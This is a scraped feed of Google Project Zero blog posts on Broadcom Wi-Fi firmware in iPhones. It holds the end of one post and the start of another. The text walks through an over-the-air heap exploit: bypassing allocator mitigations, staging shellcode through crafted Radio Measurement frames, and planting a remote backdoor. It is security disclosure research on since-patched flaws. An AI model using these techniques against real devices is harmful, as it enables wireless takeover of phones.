We’ll do so by leveraging a little trick. After allocating all the BAs, we’ll proceed to slightly increment the last BA’s size using the vulnerability primitive. Once that chunk is freed, a free chunk is subsequently created in its place, spanning the new expanded size instead of the original allocation’s size. Since the new free chunk extends into neighbouring BAs, the next BA allocation will therefore overlap a previously allocated BA. This allows us to effectively “sink” an allocation into neighbouring blocks, advancing the scope of influence of our NRREP buffer to previously unreachable objects!
As the allocator’s “malloc” function zeroes every chunk upon allocation, following the plan above will lead to BA6’s size being set to zero. However, there’s no need to fret, we can simply increase it using our NRREP primitive (as we’re now within range of BA6).
Next, we’ll increase BA6’s size slightly until it nearly overlaps with BA5. Then, we can free both BAs, and proceed to use the NRREP buffer to increase BA6’s free chunk until it overlaps with BA5’s. It’s important to note that since both “holes” are much smaller than the NRREP buffer, it won’t be placed within them, leaving us to utilise them as we please.

Bypassing Mitigation #2
Having created a pair of overlapping free-chunks, our first instinct is to carve an allocation from the encompassing chunk, thereby overwriting the other chunk’s metadata. To do so, we’ll need to find an allocation primitive allowing for control over its contents.
Recall that we have already searched for (and failed to locate) allocations with a controlled lifetime. Therefore, any allocation primitive we do find would be one with a limited lifespan. But alas, freeing an allocation carved from any of the overlapping chunks will lead us once again to the “free” function’s overlapping chunk mitigation, subsequently halting the firmware (and thwarting our attempt). Let’s take a closer look at the mitigation and see whether we can find a way around it.
Going through the code, it appears to have the following high-level logic:
1.     //Calculating the current chunk’s bounds2.     uint8_t* start = (uint8_t*)cur + sizeof(uint32_t);3.     uint8_t* end   = start + (cur->size & 0xFFFFFFFC);4.     5.     //Checking for intersection between the current chunk and each free-chunk6.     for (freechunk_t* p = get_freelist_head(); p != NULL; p = p->next) {7.         uint8_t* p_start = (uint8_t*)p;8.         uint8_t* p_end   = p_start + (p->size & 0xFFFFFFFC) + 2 * sizeof(uint32_t);9.         if (end > p_start && p_end > start)10.             CRASH();11.     }
As we can see above, the code snippet above lacks checks for integer overflows! Therefore, by storing a sufficiently large size in a free chunk, the calculation of p_end will result in an integer overflow, leading the value stored to become a low address. Consequently, the expression at line 9 will always evaluate to “false”, allowing us to bypass the mitigation.
Great, so all we need to do is ensure that when overwriting BA5’s free chunk, we also set its size to an exorbitantly large value. Moreover, as we’re dealing with a “best-fit” allocator, such a chunk will never be the best fitting (as smaller chunks will always exist), therefore there’s no need to worry about the allocator using our malformed chunk in the interim.Creating Overlapping Chunks
To proceed, we’ll need to locate an allocation primitive allowing control over its contents, and preferably also offering a controlled size. Using such a primitive, we’ll be able to create an allocation for which BA6’s free chunk is the best fitting, subsequently overwriting BA5’s free-chunk header.
Going through the action frame handlers once again, we find a near-fit; Spectrum Measurement Requests (SPECMEAS). In short, SPECMEAS frames ( are action frames belonging to the Spectrum Management category. These requests are used by access points to instruct stations to perform various measurements and report the results back to the network.
Broadcom’s Wi-Fi firmware supports two different types of measurements; a “basic” measurement, and a “Clear Channel Assessment” (CCA) measurement. Upon receiving a SPECMEAS request, the firmware allocates a buffer in order to store the report’s data. For every “CCA” measurement received, 5 bytes are added to the buffer’s size. However, for every “CCA” measurement encountered, 17 bytes are added to the buffer, of which many contain attacker-controlled data!
Using this primitive we can therefore trigger allocations of sizes that are linear combinations of 5 and 17. For every 17-byte block corresponding to a “basic” measurement, we can control several of the embedded bytes (namely, those at indices [5,15], 2).
While not a perfect allocation primitive, it’ll have to do. Since there are more than eight subsequent controlled bytes for each “basic” measurement request, we can use them in order to overwrite BA5’s free chunk header (the 32-bit size and pointer fields). By using a linear combination of the sizes above, we’ll guarantee that the controlled bytes are aligned with BA5’s free chunk header. Lastly, the size of the allocation performed must also be chosen so that BA6’s free chunk is the best fitting (therefore forcing the allocation to be carved from it, rather than other free chunks). Putting it all together, we arrive at the following layout:
Overwrite Candidates
Now that we’re able to commandeer free chunks, we just need to find some overwrite candidates in order to hijack the control flow.
Whereas in the previous firmware versions we researched, in-use chunks contained the same fields as a free chunks (namely, 32-bit size and next fields), the current chunks’ formats make them incompatible with free chunks. Therefore, in-use chunks normally do not constitute valid targets to impersonate free chunks.
Nonetheless, it is not entirely impossible that such objects exists. For example, any in-use allocation starting with a 32-bit zero word would be a valid free chunk. Similarly, chunks could begin with 32-bit pointers to other data types, which themselves may constitute a valid chain of free chunks. Even better yet, any data structure in the firmware’s RAM (not only heap chunks) could conceivably masquerade as a free chunk, so long as it follows the above format.
To get to the bottom of this, we’ve written a short script that goes over the firmware’s contents, searching for blocks that match the aforementioned description. Each block we discover constitutes a potential overwrite target by directing our fake free chunk at it. Running the script on a RAM dump of the firmware, we are greeted with the following result:

Great, there appear to be several candidates for overwrite!
In our previous exploration of the Wi-Fi firmware, we identified a certain class of objects that made good targets for hijacking control flow -- timers. These structures hold function pointers denoting periodically invoked timer functions. While many such timers exist in the current firmware as well, they are rather hard to overwrite using the above primitive. First, they do not start with a 32-bit zero field (but rather with the magic value “MITA”). Second, each timer is a link in a doubly-linked list, whose contents are constantly manipulated. To overwrite a timer, we’d need to insert a valid element into the list.
Instead, going over the list of candidates above, we come across a structure within the “persist” segment, containing a block of function pointers. Using our firmware debugger, we can indeed verify that several of the function pointers within this structure are periodically invoked. Therefore, by finding a free chunk candidate within this block, we should be able to commandeer one of the aforementioned function pointers, directing it at a location of our choice.

Unfortunately, attempting to do so results in a resounding failure.Bypassing Mitigation #3
Each attempt to allocate data on top of the aforementioned block of function pointers using SPECMEAS frames, immediately causes the firmware to halt. Inspecting the source of the crash leads us back to one of the mitigations we mentioned earlier on; the “disallowed ranges” list.
Apparently, the entire “persist” block is contained in the list of regions within which “free” operations must not occur. Consequently, without bypassing this mitigation, we will not be able to overwrite data within the aforementioned range.
Thinking about this mitigation for a moment, we come up with an interesting proposition: perhaps we could use our commandeered free chunk in order to overwrite the “disallowed ranges” list itself?
While the list’s contents lays within one of the disallowed zones, recall that this validation is only performed by the “free” function, whereas “malloc” will happily carve allocations at any address, without consulting the above list. Therefore, by pointing our free chunk to a location overlapping the “disallowed ranges” list, we can use a SPECMEAS frame to overwrite its contents (thereby nullifying its effect). While SPECMEAS frames are immediately freed after they are allocated, this is no longer a concern, as by the time the “free” occurs, the “disallowed ranges” will have already been overwritten!Putting It All Together
Using the steps above, we can disable the “disallowed ranges” list, allowing us to subsequently use the commandeered free chunk in order to hijack one of the function pointers in the persist block. Finally, we simply require a means of stashing some shellcode in a predictable location within the firmware’s RAM. By doing so, we will be able to direct the aforementioned function pointer at our shellcode, leading to arbitrary code execution.
Since the addresses within the “persist” block are fixed, they make for prime candidates to store our shellcode. Searching through the block, we come across several potential overwrite candidates, any of which can be hijacked with our “fake” free chunk.
However, there’s one more hurdle to overcome -- the code we’re about to store must not be overwritten at any point. If the code is inadvertently overwritten, the firmware will attempt to execute a corrupted chunk of code, possibly leading it to crash.
To get around this limitation, we’ll use one more action frame: Radio Measurement Requests (RMREQ). These frames are part of the 802.11k RRM standard, and allow for periodic measurements to be performed (and reported) by the firmware. Similarly to SPECMEAS frames, their handler allocates several bytes of data for each measurement IE encoded in the request.
Most importantly, RMREQ frames include a field denoting the number of repetitions that stations should perform when receiving the scan request. Going through the specification reveals that this field also has a “special” value, allowing scans to continue indefinitely:
IEEE 802.11-2016,
By encoding this value in an RMREQ frame, we can guarantee that the corresponding allocated buffer will not be subsequently freed, therefore allowing safe storage of our code.
Lastly, we need to consider the problem of the shellcode’s internal structure. Unlike SPECMEAS frames which allowed us to control multiple bytes in each chunk of the allocated buffer, RMREQ frames only provide control over four subsequent bytes out of every 20-bytes allocated. Luckily, as Thumb is a dense instruction set, it allows us to cram two instruction into each 32-bit controlled word. Therefore, we can break up our shellcode using the following pattern: the first 16-bit word will encode an instruction of our choosing, whereas the second word will contain a relative branch to the next controlled chunk. Formatting our shellcode in this manner allows us to construct arbitrarily large chunks of shellcode:

Building a Backdoor
Combining all the primitives above, we can finally stash and execute a chunk of shellcode on the Wi-Fi firmware!
To allow for easier exploration of the firmware, it’s worth taking a moment to convert this rudimentary form of access to a more refined toolset. Otherwise, we’d have to resort to encoding all the post-exploitation logic using segmented chunks of shellcode -- not an alluring prospect.
We’ll begin by using the shellcode above to write a small “backdoor” into the firmware, which we’ll call the “initial payload”. This payload constitutes the most minimal backdoor imaginable; it simply intercepts the NRREP handler, and reads two 32-bit words from it, storing the value of one word into the address denoted by the other. The initial payload therefore allows us to perform arbitrary 32-bit writes to the firmware’s RAM, by sending crafted NRREP frames over-the-air.
Next, we’ll use the initial payload in order to write a more sophisticated one, which we’ll refer to as the “secondary payload”. This payload also intercepts the NRREP handler (replacing the previous hook), but allows for a far richer set of commands, namely:
  1. Reading data from the firmware RAM
  2. Writing to the firmware’s RAM
  3. Executing a shellcode stub
  4. Performing a CRC32 calculation on a block of data

The capabilities above allow us to fully control the firmware’s over-the-air, from the safety of a python script. Indeed, not unlike our research platform, we’ve implemented the protocols for communicating with the backdoor in python, allowing for APIs implementing all of the functionality above.
In fact, the two are so similar, that several of the research framework’s modules can be directly executed using the secondary payload, by simply replace the memory access APIs in the research framework with those offered by the secondary payload.The Exploit
Summing up all the work above, we’ve finally written a complete exploit, allowing code execution on the Wi-Fi chip of the iPhone 7. You can find the complete exploit here.
The exploit has been tested against the Wi-Fi firmware present in iOS 10.2 (14C92). The vulnerability is present in versions of iOS up to (and including) iOS 10.3.3. Researchers wishing to utilise the exploit on different iDevices or different versions, would be required to adjust the necessary symbols used by the exploit (see “exploit/”).
Note that the exploit continuously attempts to install the backdoor into the Wi-Fi firmware, until it is successful. For any unsuccessful attempt, the firmware simply silently reboots, allowing the exploit to continue along. Moreover, due to a clever feat of engineering by Apple, rebooting the firmware does not interrupt ongoing connections; instead, they are continued as the chip reboots, allowing for a rather stealthy attack.
Wrapping Up
Over the course of this blog post we performed a deep dive into the Wi-Fi firmware present on the iPhone 7. Our exploration led us to discover new attack surfaces, several added mitigations, and multiple vulnerabilities.
By exploiting one of the aforementioned vulnerabilities, we were able to gain control over the Wi-Fi SoC, allowing us to gain a foothold on the device itself, directly over-the-air. In doing so, we also bypassed several of the firmware’s exploit mitigations, demonstrating how they can be reinforced in future versions.
In the next blog post, we’ll complete our journey towards full control over the target device, by devising a full exploit chain allowing us to leverage our newly acquired control over the Wi-Fi chip in order to launch an attack against iOS itself. Ultimately, we’ll construct an over-the-air exploit allowing complete control over the iOS kernel.
Categories: Security

Over The Air - Vol. 2, Pt. 1: Exploiting The Wi-Fi Stack on Apple Devices

Google Project Zero - Thu, 09/28/2017 - 11:21
Posted by Gal Beniamini, Project Zero
Earlier this year we performed research into Broadcom’s Wi-Fi stack. Due to the ubiquity of Broadcom’s stack, we chose to conduct our prior research through the lens of one affected family of products -- the Android ecosystem. To paint a more complete picture of the state of Wi-Fi security in the mobile ecosystem, we’ve chosen to revisit the topic - this time through the lens of Apple devices. In this research we’ll perform a deeper dive into each of the affected components, discover new attack surfaces, and finally construct a full over-the-air exploit chain against iPhones, allowing complete control over the target device.
Since there’s much ground to cover, we’ve chosen to split the research into a three-part blog series. The first blog post will focus on exploring the Wi-Fi stack itself and developing the necessary research tools to explore it on the iPhone. In the second blog post, we’ll perform research into the Wi-Fi firmware, discover multiple vulnerabilities, and develop an exploit allowing attackers to execute arbitrary code on the Wi-Fi chip itself, requiring no user-interaction. Lastly, in the final blog post we’ll explore the iPhone’s host isolation mechanisms, research the ways in which the Wi-Fi chip interacts with the host, and develop a fully-fledged exploit allowing attackers to gain complete control over the iOS kernel over-the-air, requiring no user interaction.
As we’ve mentioned before, Broadcom’s chips are present in a wide variety of devices - ranging from mobile phones to laptops (such as Chromebooks) and even Wi-Fi routers. While we’ve chosen to focus our attention on the Apple ecosystem this time around, it’s worth mentioning that the Wi-Fi firmware vulnerabilities presented in this research affect other devices as well. Additionally, as this research deals with a different attack surface in the Wi-Fi firmware, the breadth of affected devices might be wider than that of our prior research.
More concretely, the Wi-Fi vulnerabilities presented in this research affect many devices in the Android ecosystem. For example, two of the vulnerabilities (#1, #2) affect most of Samsung’s flagship devices, including the Galaxy S8, Galaxy S7 Edge and Galaxy S7. Of the two, one vulnerability is also known to affect Google devices such as the Nexus 6P, and some models of Chromebooks. As for Apple’s ecosystem, while this research deals primarily with iPhones, other devices including Apple TV and iWatch are similarly affected by our findings. The exact breadth of other affected devices has not been investigated further, but is assumed to be wider.
We’d also like to note that until hardware host isolation mechanisms are implemented across the Android ecosystem, every exploitable Wi-Fi firmware vulnerability directly results in complete host takeover. In our previous research we identified the lack of host isolation mechanisms on two of the most prominent SoC platforms; Qualcomm’s Snapdragon 810 and Samsung’s Exynos 8890. We are not aware of any advances in this regard, as of yet.
For the purpose of this research, we’ll demonstrate remote code execution on the iPhone 7 (the most recent iDevice at the time of this research), running iOS 10.2 (14C92). The vulnerabilities presented in this research are present in iOS up to (and including) version 10.3.3 (apart from #1, which was fixed in 10.3.3). Researchers wishing to port the provided research tools and exploits to other versions of iOS or to other iDevices would be required to adjust the referenced symbols.
Over the course of the blog post, we’ll begin fleshing out a memory research platform for iOS. Throughout this blog post series, we’ll rely on the framework extensively, to both analyse and explore components on the system, including the XNU kernel, hardware components, and the Wi-Fi chipset itself. In the next few days, we intend to release the framework publicly. Once the code is made public, we will include links to the corresponding modules to this blog post.
The vulnerabilities affecting Apple devices have been addressed in iOS 11. Similarly, those affecting Android have been addressed in the September bulletin. Note that within the Android ecosystem, OEMs bear the responsibility for providing their own Wi-Fi firmware images (partially due to their high level of customisation). Therefore the corresponding fixes should appear in the vendors’ own bulletins, rather than Android’s security bulletin.
Creating a Research Platform
Before we can begin exploring, we’ll need to lay down the groundwork first. Ideally, we’d like to create our own debugger -- allowing us to both inspect and instrument the Wi-Fi firmware, thereby making exploration (and subsequent exploit development) much easier.
During our previous research into Broadcom’s Wi-Fi chip within the context of the Android ecosystem, this task turned out to be much more straight-forward than expected. Instead of having to create an entire research environment from scratch, we relied on several properties provided by the Android ecosystem to speed up the development phase.
For starters, many Android devices allow developers to intentionally bypass their security model, using “rooted” builds (such as userdebug). Flashing such a build onto a device allows us to freely explore and interact with many components on the system. As the security model is only bypassed explicitly, the odds of side-effects resulting from our research affecting the system’s behaviour are rather slim.
Additionally, Broadcom provides their own debugging tools to the Android ecosystem, consisting of a command-line utility and a dedicated set of ioctls within Broadcom’s device driver, bcmdhd. These tools allow sufficiently privileged users to interact with the Wi-Fi chip in a variety of ways, including the ability to access the chip’s RAM directly -- an essential primitive when constructing a debugger. Basing our own toolset on this platform allowed us to create a rather comfortable research environment.
Furthermore, Android utilises the Linux Kernel, which is licensed under GPLv2. Therefore, the kernel’s source code, including that of the device drivers, is freely available. Reading through Broadcom’s device driver (bcmdhd) turned out to be an invaluable resource -- sparing us some unnecessary reverse-engineering while also allowing us to easily assess the ways in which the chip and host interact with one another.
Lastly, some of the data sheets pertaining to the Wi-Fi SoCs used on Android devices were made publicly available by Cypress following their acquisition of Broadcom’s IoT business. While most of the information in the data sheets is irrelevant to our research, we were able to gather a handful of useful clues regarding the architecture of the SoC itself.

Unfortunately, it appears we have no such luck this time around!
First, Apple does not provide a “developer-mode” iPhone, nor is there a mechanism to selectively bypass the security model. This means that in order to meaningfully explore the system, researchers are forced to subvert the device’s security model (i.e., by jailbreaking). Consequently, exploring different components within the device is made much more difficult.
Additionally, unlike the Android ecosystem, Apple has chosen to develop their entire host-side stack “from scratch”. Most importantly, the iOS drivers used to interact with Broadcom’s chip are written by Apple, and are not based on Broadcom’s FullMAC drivers (bcmdhd or brcmfmac). Other host-side utilities, such as Broadcom’s debugging toolchain, are thus also not included.
That said, Apple did develop their own mechanisms for accessing and debugging the chip. These capabilities are exposed via a set of privileged ioctls embedded in the IO80211Family driver. While the interface itself is undocumented, reverse-engineering the corresponding components in both the IO80211Family and AppleBCMWLANCore drivers reveals a rather powerful command channel, and one which could possibly be used for the purposes of our research. Unfortunately, access to this interface requires additional entitlements, thus preventing us from leveraging it (unless we escalate our privileges).
Lastly, there’s no overlap between the revisions of Wi-Fi chips used on Apple’s devices and those used in the Android ecosystem. As we’ll see later on, this might be due to the fact that Apple-specific Wi-Fi chips contain Apple-specific features. Regardless, perhaps unsurprisingly, none of the corresponding data sheets for these SoCs have been made available.

So… it appears we’ll have to deal with a proprietary chip, on a proprietary device running a proprietary operating system. We have our work cut out for us! That said, it’s not all doom and gloom; instead of relying on all of the above, we’ll just need to create our own independent research platform.Acquiring the ROM?
Let’s start by analysing the SoC’s firmware and loading it up into a disassembler. As we’ve seen in the previous round of research, the Wi-Fi firmware consists of a small chunk of ROM containing most of the firmware’s data and code, and a larger blob of RAM housing all of the runtime data structures (such as the heap and stack), as well as patches to the ROM’s code.
Since the RAM blob is loaded into the Wi-Fi chip during its initialisation by the host, it should be accessible via the host’s root filesystem. Indeed, after downloading the iPhone’s firmware image, extracting the root filesystem and searching for indicative strings, we are greeted with the following result:

Great, so we’ve identified the firmware’s RAM. What’s more, it appears that the Wi-Fi chip embedded in the phone is a BCM4355C0, a model which I haven’t come across in Android devices in the past (also, it curiously does not appear under Broadcom’s website).
Regardless, having the RAM image is all well and good, but what about the ROM? After all, the majority of the code is stored in the chip’s ROM. Even if we were to settle for analysing the RAM alone, it’d be extremely difficult to reverse-engineer independently of the ROM as many of the functions in the former address data stored in the latter. Without knowing the ROM’s contents, or even its rudimentary layout, we’ll have to resort to guesswork.
However, this is where we run into a bit of a snag! To extract the ROM we’ll need to interact with the Wi-Fi chip itself... Whereas on Android we could simply use a “rooted” build to gain elevated privileges, and then access the Wi-Fi SoC via Broadcom’s debugging utilities, there are no comparable mechanisms on the iPhone. In that case, how will we interact with the chip and ultimately extract its ROM?
We could opt for a hardware-based research environment. Reviewing the data sheets for one of Broadcom’s Wi-Fi SoCs, BCM4339, reveals several interfaces through which the chip may be debugged, including UART and a JTAG interface.

That said, there are several disadvantages to this approach. First, we’d need to open up the device, locate the required interfaces, and make sure that we do not damage the phone in the process. Moreover, requiring a such a setup for each research device would cause us to incur significant start-up overhead. Perhaps most importantly, relying on a hardware-based approach would limit the amount of researchers who’d be willing to utilise our research platform -- both because hardware is a relatively specialised skill-set, and since people might (rightly) be wary of causing damage to their own devices.
So what about a completely software-based solution? After all, on Android devices we were able to access the chip’s memory solely using software. Perhaps a similar solution would apply to Apple devices?
To answer this question, let’s trace our way through the Android components involved in the control flow for accessing the Wi-Fi chip’s memory from the host. The flow begins with a user issuing a memory access command via Broadcom’s debugging utility (“membytes”). This, in turn, triggers an ioctl to Broadcom’s driver, requesting the memory access operation. After some processing within the driver, it performs the requested action by directly accessing the chip’s tightly-coupled memory (TCM) from the kernel’s Virtual Address-Space (VAS).

Two Registers Walk Into a BAR
As we’re mostly interested in the latter part, let’s disregard the Android-specific components for now and focus on the mechanism in bcmdhd allowing TCM access from the host.
Reviewing the driver’s code allows us to arrive at relevant code flow. First, the driver enables the PCIe-connected Wi-Fi chip. Then, it accesses the PCIe Configuration Space to program the Wi-Fi chip’s Base Address Registers (BARs). In keeping with the PCI standards, programming and mapping in the BARs into the host’s address space exposes functionality directly from the Wi-Fi SoC to the host, such as IO-Space or Memory Space access. Taking a closer look at Broadcom’s chips, they seem to provide two BARs in their configuration space; BAR0 and BAR1.
BAR0 is used to map-in registers corresponding to the different cores on the Wi-Fi SoC, including the ARM processor running the firmware’s logic, and more esoteric components such as the PCIe Gen 2 core on the Wi-Fi SoC. The cores themselves can be selected by accessing the PCIe configuration space once again, and programming the “BAR0 Window” register, directing it at the backplane address corresponding to the requested core.
BAR1, on the other hand, is used solely to map the Wi-Fi chip’s TCM into the host. Since Broadcom’s driver leverages the TCM access capability extensively, it maps-in BAR1 into the kernel’s virtual address space during the device’s initialisation, and doesn’t unmap it until the device shuts down. Once the TCM is mapped into the kernel, all subsequent memory accesses to the chip’s TCM are performed by simply modifying the mapped block within the kernel’s VAS. Any write operations made to the memory-mapped block are automatically reflected to the Wi-Fi chip’s RAM.
This is all well and good, but what about iOS? Since Apple develops their own drivers for interacting with Broadcom’s chips, what holds true in Broadcom’s drivers doesn’t necessarily apply to Apple’s drivers. After all, we could think of many different approaches to accessing the chip’s memory. For example, instead of mapping the entire TCM into the kernel’s memory, they might elect to only map-in certain regions of the TCM, to map it only on-demand, or even to rely on different chip-access mechanisms altogether.
To get to the bottom of this, we’ll need to start reverse-engineering Apple’s drivers. This can be done by extracting the kernelcache from the iPhone’s firmware and loading it into our favourite disassembler. After loading the kernel, we immediately come across two driver KEXTs related to Broadcom’s Wi-Fi chip; AppleBCMWLANCore and AppleBCMWLANBusInterfacePCIe.
Spending some time reverse-engineering the two drivers, it’s quickly evident what their corresponding roles are. AppleBCMWLANCore serves as a high-level driver, dealing mostly with configuring the Wi-Fi chip, handling incoming events, and chip-specific features such as offloading. In keeping with good design practices, the driver is unaware of the interface through which the chip is connected, allowing it to focus solely on the logic required to interact with the chip. In contrast, AppleBCMWLANBusInterfacePCIe, serves a complementary role; it is a low-level driver tasked with handling all the PCIe related communication protocols, dealing with MSI interrupts, and generally everything interface-related.
We’ll revisit the two drivers more in-depth later on, but for now it’s sufficient to say that we have a relatively good idea where to start looking for a potential TCM mapping -- after all, as we’ve seen, the TCM access is performed by mapping the PCIe BARs. Therefore, it would stand to reason that such an operation would be performed by AppleBCMWLANBusInterfacePCIe.
After reverse-engineering much of the driver, we come across a group of suspicious-looking functions that appear like candidates for TCM accessors. All the above functions serve the same purpose -- accessing a memory-mapped buffer, differing from one another only in the size of the word used (16, 32, or 64-bit). Anecdotally, the corresponding APIs for TCM access in the Android driver follow the same structure. What’s more, the above functions all reference the string “Memory”... We might be onto something!
Kernel Function 0xFFFFFFF006D1D9F0
Cross-referencing our way up the call-chain, it appears that all of the above functions are methods pertaining to instances of a single class, which incidentally bears the same name as that of the driver: AppleBCMWLANBusInterfacePCIe. Since several functions in the call-chain are virtual functions, we can locate the class’s VTable by searching for 64-bit words containing their addresses within the kernelcache.

To avoid unnecessary confusion between the object above and the driver, we’ll refer to the object for now on as the “PCIe object”, and we’ll refer to the driver by its full name; “AppleBCMWLANBusInterfacePCIe”.
Kernel Memory Analysis Framework
Now that we’ve identified mechanisms in the kernel possibly relating to the Wi-Fi chip’s TCM, our next course of action is to somehow access them. Had we been able to debug the iOS kernel, we could have simply placed a breakpoint on the aforementioned memory access functions, recorded the location of the shared buffer, and then used our debugger to freely access the buffer on our own. However, as it happens, iOS offers no such debugger. Indeed, having such a debugger would allow users to subvert the device’s security model...
Instead, we’ll have to create our kernel debugger!
Debuggers usually consist of two main pieces of functionality:
  1. The ability to modify the control flow of the program (e.g., by inserting breakpoints)
  2. The ability to inspect (and modify) the data being processed by the program

As it happens, modifying the kernel’s control flow on modern Apple devices (such as the iPhone 7) is far from trivial. These devices include a dedicated hardware component -- Apple’s Memory Cache Controller (AMCC), designed to prevent attackers from modifying the kernel’s code, even in the presence of full control over the kernel itself (i.e., EL1 code execution). While AMCC might make for an interesting research target in its own right, it’s not the main focus of our research at this time. Instead, we’ll have to make do with analysing and modifying the data processed by the kernel.
To gain access to the kernel, we’ll first need to exploit a privilege escalation vulnerability. Luckily, we can forgo all of the complexity involved in developing a functional kernel exploit, and instead rely on some excellent work by Ian Beer.
Earlier this year, Ian developed a fully-functional exploit allowing kernel code execution from any sandboxed process on the system. Upon successful execution, Ian’s exploit provides two primitives - memory-read and memory-write - allowing us to freely explore the kernel’s virtual address-space. Since the exploit was developed against iOS 10.2, we’ll need use the same version on our target iPhone to utilise it.
To allow for increased flexibility, we’ll aim to design our research platform to be modular; instead of tying the platform to a specific memory access mechanism, we’ll use Ian’s exploit as a “black-box”, only deferring memory accesses to the exploit’s primitives.
Moreover, it’s important that whatever system we build allows us to explore the device comfortably. Thinking about this for a moment, we can boil it down to a few basic requirements:
  1. The analysis should be done on a developer-friendly machine, not on the iPhone
  2. The platform should be scriptable and easily extensible
  3. The platform should be independent of the memory access mechanism used

To prevent any dependance on the memory access mechanism, we’ll implement a rudimentary command protocol, allowing clients to perform read or write operation, as well as offering an “execute” primitive for gadgets within the kernel’s VAS. Next, we’ll insert a small stub implementing this protocol into the exploit, allowing us to interface with the exploit as if it were a “black box”. As for the client, it can be executed on any machine, as long as it’s able to connect to the server stub and communicate using the above protocol.
A version of Ian Beer’s extra_recipe exploit with the aforementioned server stub can be found on our bug tracker, here.
Lastly, there’s the question of the research platform itself. For convenience sake, we’ve decided to develop the framework as a set of Python scripts, not unlike forensics frameworks such as Volatility. We’ll slowly grow the framework as we go along, adding scripts for each new data structure we come across.
Since the iOS kernel relies heavily on dynamic dispatch, the ability to explore the kernel in a shell-like interface allows us to easily resolve virtual call targets by inspecting the virtual pointers in the corresponding objects. We’ll use this ability extensively to assist our static analysis in place where the code is hard to untangle.
Over the course of our research we’ll develop several modules for the analysis framework, allowing interaction with objects within the XNU kernel, parts of IOKit, hardware components, and finally the Wi-Fi chip itself.
Setting Up a Test Network
Moving on, we’ll need to create a segregated test network, consisting of the target iPhone, a single MacBook (which we’ll use to interact with the iPhone), and a Wi-Fi router.
As our memory analysis framework transmits data over the network, both the iPhone and the MacBook must be able to communicate with one another. Additionally, as we’re using Xcode to deploy the exploit from the MacBook to the iPhone, it’d be advantageous if the test network allowed both devices to access the internet (so the developer profile could be verified).
Lastly, we require complete control over all aspects of our Wi-Fi router. This is since the next part of our research will deal extensively with the Wi-Fi layer. As such we’d like to reserve the ability to inject, modify and drop frames within our network -- primitives which may come in handy later on.
Putting the above requirements together, we arrive at the following basic topology:

In my own lab setup, the role of the Wi-Fi router is fulfilled by my ThinkPad laptop, running Ubuntu 16.04. I’ve connected two SoftMAC TL-WN722N dongles, one for each interface (internal and external). The internal network’s access-point is broadcast using hostapd, and the external interface connects to the internet using wpa_supplicant. Moreover, network-manager is disabled to prevent interference with our configuration.
Note that it’s imperative that the dongle used to broadcast the internal network’s access-point is a SoftMAC device (and not FullMAC) -- this will ensure that the MLME and MAC layers are processed by the host’s software (i.e., by the Linux Kernel and hostapd), allowing us to easily control the data transmitted over those layers.
The laptop is also minimally configured to perform IP forwarding and to serve as a NAT, in order to allow connections from the internal network out into the internet. In addition, I’ve set up both DNS and DHCP servers, to prevent the need for any manual configuration. I also recommend setting up DNS forwarding and blocking Apple’s software-update domains within your network (,
Depending on your work environment, it may be the case that many (or most) Wi-Fi channels are rather crowded, thereby reducing the signal quality substantially. While dropping frames doesn’t normally affect our ability to use the network (frames would simply be re-transmitted), it may certainly cause undesirable effects when attempting to run an over-the-air exploit (as re-transmissions may alter the firmware’s state substantially).
Anecdotally, scanning for nearby networks around my desk revealed around 60 Wi-Fi networks, causing quite a bit of noise (and frame loss). If you encounter the same issue, you can boost your RSSI by building a small cantenna and connecting it to your dongle:

Finding the TCM
Using our test network and memory analysis platform, let’s start exploring the kernel’s VAS!
We’ll begin the hunt by searching for the PCIe object within the kernel. After all, we know that finding the object will allow us to locate the suspect TCM mapping, bringing us closer to our goal of developing a Wi-Fi firmware debugger. Since we’re unable to place breakpoints, we’ll need to locate a “path” leading from a known memory location to that of the PCIe object.
So how will we identify the PCIe object once we come across it? Well, while the C++ standards do not explicitly specify how dynamic dispatch is implemented, most compilers tend to use the same ABI for this purpose -- the first word of every object containing virtual functions serves as a pointer to that object’s virtual table (commonly referred to as the “virtual pointer” or “vptr”). By leveraging this little tidbit, we can build our own object identification mechanism; simply read the first word of each object we come across, and check which virtual table it corresponds to. Since we’ve already located the VTable corresponding to the PCIe object we’re after, all we’d need to do is check each object against that address.
Now that we know how to identify the object, we can begin searching for it within the kernel. But where should we start? After all, the object could be anywhere in the kernel’s VAS. Perhaps we can gain some more information by taking a look at the the object’s constructor. For starters, doing so will allow us to find out which allocator is used to create the object; if we’re lucky, the object may be allocated from a special pool or stored in a static location.
Kernel Function 0xFFFFFFF006D34734
(OSObject’s “new” operator is a wrapper around kalloc - the XNU kernel allocator).
Looking at the code above, it appears that the PCIe object is not allocated from a special pool. Perhaps, instead, the object is addressable through data stored in the driver’s BSS or data segments? If so, then by following every “chain” of pointers originating in the above segments, we should be able to locate a chain terminating at our desired object.
To test out this hypothesis, let’s write a short python script to perform a depth-first search for the object, starting in the driver’s BSS and data segments. The script simply iterates over each 64-bit word and checks whether it appears to be a valid kernel virtual address. If so, it recursively continues the search by following the pointer and its neighbouring pointers (searching both forwards and backwards), stopping only when the maximal search depth is reached (or the object is located).

After running the DFS and following pointers up to 10 levels deep, we find no matching chain. It appears that none of the objects in the BSS or data segments contain a (sufficiently short) pointer chain leading to our target object.
So how should we proceed? Let’s take a moment to consider what we know about the object so far. First, the object is allocated using the XNU kernel allocator, kalloc. We also know the exact size of the allocation (3824 bytes). And, of course, we have a means of identifying the object once located. Perhaps we could inspect the allocator itself to locate the object...
On the one hand, it’s entirely possible that kalloc doesn’t keep track of in-use allocations. If so,  tracking down our object would be rather difficult. On the other hand, if kalloc does have a way of identifying past allocations, we can parse its data structures and follow the same logic to identify our object. To get to the bottom of this, let’s download the XNU source code corresponding to this version of iOS, and read through kalloc’s implementation.
After spending some time familiarising ourselves with kalloc’s implementation, we can sketch a high-level view of the allocator’s implementation. Since kalloc is a “zone allocator”, each allocated object is assigned a region from which it is drawn. Individual regions are represented by the zone_t structure, which holds all of the metadata pertaining to the zone.
The allocator’s operation can be roughly split into two phases: identifying the corresponding zone for each allocation, and carving the allocation from the zone. The identification process itself takes on three distinct flows, depending on the size of the requested allocation. Once the target zone is identified, the allocation process proceeds identically for all three flows.
